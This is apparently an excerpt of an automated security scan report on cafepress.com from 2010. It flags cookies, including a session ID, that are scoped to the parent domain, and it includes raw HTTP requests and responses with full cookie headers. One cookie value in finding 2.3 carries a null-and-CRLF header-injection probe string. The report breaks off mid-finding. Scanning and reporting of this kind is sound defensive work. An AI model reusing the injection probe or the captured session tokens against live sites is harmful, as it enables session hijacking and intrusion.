/+bumper-stickers
/+buttons
/+calendars
/+clocks
/+coasters
/+eat_sleep_game_light_tshirt,299007536
/+framed-prints
/+greeting_cards
/+hats-caps
/+ipad-cases
/+iphone-cases
/+journals
/+keepsake_boxes
/+license_plate_frames
/+magnets
/+mousepads
/+mugs
/+ornaments
/+posters
/+stadium-blanket
/+steins
/+stocking
/+sweatshirts-hoodies
/+thermos
/+underwear-panties
/+water-bottles
/+womens-tank-tops
/+womens-thongs
/+yoga-mats
/TheGamingApe
/cp/catalogExp/RedirectWithSEOURL.aspx
/cp/catalogExp/addtocarthelper.aspx
/cp/info/about/
/cp/info/help/
/cp/info/help/index.aspx
/cp/info/sell/index.aspx
/cp/moredetails.aspx
/cp/products/
/cp/sitemap/
/cp/tags/
/cp/viewcart.aspx
/make/birth-announcements
/make/custom-baby-gear
/make/custom-buttons
/make/custom-hats
/make/custom-hoodies-sweatshirts
/make/custom-ipad-case
/make/custom-iphone-cases
/make/custom-mugs
/make/custom-stickers
/make/custom-stockings
/make/custom-t-shirts
/make/custom-thermos
/make/custom-water-bottles
/make/holiday-invitations
/make/holiday-photo-cards
/make/makeacard.aspx
/make/personalized-gifts
/make/personalized-ornaments
/sk/TheGamingApe

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

2.1. http://www.cafepress.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Content-Length: 0
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392

Response

2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

2.5. http://www.cafepress.com/+aprons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.6. http://www.cafepress.com/+baby-blanket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.7. http://www.cafepress.com/+baby-bodysuits previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.8. http://www.cafepress.com/+baby-hat previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

